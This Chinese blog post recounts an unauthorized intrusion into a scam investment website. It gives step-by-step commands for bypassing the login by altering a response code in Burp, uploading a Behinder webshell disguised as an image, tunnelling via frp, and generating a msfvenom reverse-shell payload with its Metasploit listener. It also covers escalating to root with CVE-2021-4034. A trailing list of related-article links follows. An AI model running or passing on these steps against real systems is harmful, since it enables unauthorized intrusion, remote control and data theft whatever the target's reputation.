【网络安全】记一次杀猪盘渗透实战

看起来非常假的网站这个网站是没有cdn的用的是thinkphpk框架搭建的。

先打一波poc没有效果,

访问一下后台直接在url后面加/admin。

一个开源的cms还没有验证码尝试用burp进行爆破,首先在火狐上设置代理ip为127.0.0.1代理端口为8081。

Burp上也要设置端口为8081,将Intercept设置为on输入账号密码点击登录就能拦截到数据包。

在爆破之前先发送到Repeater模块发送看看反应。

用户不存在返回code为1的响应码,尝试拦截返回包把1改为0。

成功登录后台,这应该是个前端js验证非常的不安全。

尝试找上传点,点击用户管理-编辑-上传头像,上传一张jpg文件在用burp抓包改为php将内容改为冰蝎马。

成功上传链接冰蝎马。

想办法上线到msf提权,这里就使用frp内网穿透,在我的vps开启frp。

./frps -c frps.ini

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eZl49f5T-1663771859261)(https://upload-images.jianshu.io/upload_images/26472780-6ca78873840a2e91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

在内网上的kali进行设置

设置配置文件将8000端口的流量转到kali的6666端口。

启动客户端

./frpc -c frpc.ini

生成msf木马ip和端口要填vps的

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=**** LPORT=8000 -f elf > shell.elf

这里的lhost 应为服务器地址 LPORT 为反向代理端口,将shell.elf上传到/www/wwwroot/目录设置权限为777。

打开msf进行监听

复制代码
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 6666
exploit

运行shell.elf

./shell.elf

成功返回会话。

使用模块run post/multi/recon/local_exploit_suggester进行漏洞查询。

使用cve-2021-4034提权,切换到linux shell下面然后进到/tmp目录下下载脚本。

git clone

似乎不行卡住了直接上传上去吧。

复制代码
upload /home/kali/Desktop/CVE-2021-4034  /tmp/

进入shell

cd /tmp

make

chmod 777 cve-2021-4034

./cve-2021-4034

返回root权限。

查看database.php文件链接数据库发现基本上也没有人充值,看到一个账号40w的就是这家所谓数字藏品公司的老总。

登进入尝试体现均提示账户金额异常看来是跑路了,加了它们的官方群进入一看全是讨钱的

在这里提醒一下各位这种所谓的数字藏品都是骗局根本提不出来钱的。

相关推荐
北方的流星几秒前
华三交换机MSTP+VRRP配置
运维·网络·华三
胡志辉的博客2 分钟前
前端反调试:常见套路、识别方法与绕过思路
前端·javascript·web安全·状态模式·安全威胁分析·代码混淆
金士镧(厦门)新材料有限公司10 分钟前
什么是稀土?认识稀土,探索未来科技的核心
科技·安全·全文检索·生活·能源
сокол12 分钟前
【网安-Web渗透测试-Linux提权】CVE-2023-22809
linux·服务器·网络安全
是娇娇公主~21 分钟前
详解TCP三次握手
网络·网络协议·tcp/ip
不愿透露姓名的大鹏21 分钟前
NetSpot结合iperf3精准测试局域网速率
网络
小此方23 分钟前
Re:从零开始的 C++ 进阶篇(四)工业级 C++ 编程:如何构建异常安全的健壮系统?(含案例分析)
运维·开发语言·c++·安全
聊点儿技术27 分钟前
网约车高风险环节的IP欺诈风险查询应用思路
网络·tcp/ip·风险评估·ip地址查询·ip风险画像·网约车平台·ip画像api
爱学习的小囧27 分钟前
VMware ESXi 双管理网口配置全教程:新增 vmk1 端口 + 主备冗余 / 负载均衡双模式实操
运维·服务器·网络·windows·负载均衡·虚拟化
大卡片28 分钟前
TCP与UDP通信
网络·网络协议·tcp/ip